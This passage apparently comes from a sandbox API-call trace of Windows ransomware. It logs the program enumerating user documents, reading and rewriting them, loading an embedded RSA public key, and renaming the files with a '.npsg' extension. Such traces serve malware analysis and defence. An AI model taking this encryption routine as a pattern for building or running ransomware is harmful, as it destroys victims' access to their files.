hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89288 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89270 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b892d0 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89270 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89270 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89288 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89240 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892a0 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7fce8 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892d0 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ff18 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b80030 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ff18 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89270 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892b8 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90270 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fe00 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.592] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0xfd2d, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0xfd2d, lpOverlapped=0x0) returned 1 [0246.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.593] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfd32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.593] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0246.593] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.593] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.593] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.593] CloseHandle (hObject=0x644) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x900) returned 0x3b8ccd0 [0246.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.596] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\l_ORy5rqruJc7p2to.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\l_ory5rqrujc7p2to.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\l_ORy5rqruJc7p2to.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\l_ory5rqrujc7p2to.docx.npsg")) returned 1 [0246.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.596] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.598] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e1bee0, ftCreationTime.dwHighDateTime=0x1d5c0db, ftLastAccessTime.dwLowDateTime=0xaf1d7c90, ftLastAccessTime.dwHighDateTime=0x1d5ba21, ftLastWriteTime.dwLowDateTime=0xaf1d7c90, ftLastWriteTime.dwHighDateTime=0x1d5ba21, nFileSizeHigh=0x0, nFileSizeLow=0x17787, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qRy6.pdf", cAlternateFileName="")) returned 1 [0246.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\qRy6.pdf") returned=".pdf" [0246.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\qRy6.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\qry6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.600] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=96135) returned 1 [0246.600] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.602] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17761, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.602] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.603] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.603] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x17787, lpOverlapped=0x0) returned 1 [0246.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.605] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.605] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.606] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.606] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.606] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.606] GetLastError () returned 0x0 [0246.606] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.606] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.606] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.606] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.606] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17790) returned 0x3b99d50 [0246.606] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90270 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89210 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b902b8 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89258 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b892b8 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89270 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.607] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.608] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17787, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.608] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.608] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.608] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.608] CloseHandle (hObject=0x644) returned 1 [0246.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397bb8 [0246.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0246.610] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\qRy6.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\qry6.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\qRy6.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\qry6.pdf.npsg")) returned 1 [0246.611] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e1bee0, ftCreationTime.dwHighDateTime=0x1d5c0db, ftLastAccessTime.dwLowDateTime=0xaf1d7c90, ftLastAccessTime.dwHighDateTime=0x1d5ba21, ftLastWriteTime.dwLowDateTime=0xaf1d7c90, ftLastWriteTime.dwHighDateTime=0x1d5ba21, nFileSizeHigh=0x0, nFileSizeLow=0x17787, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qRy6.pdf", cAlternateFileName="")) returned 0 [0246.612] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.612] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.612] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b902b8 [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d9b8 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.612] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.613] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90300 [0246.631] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.631] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.631] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.631] PathFindFileNameW (pszPath="") returned="" [0246.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.633] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, 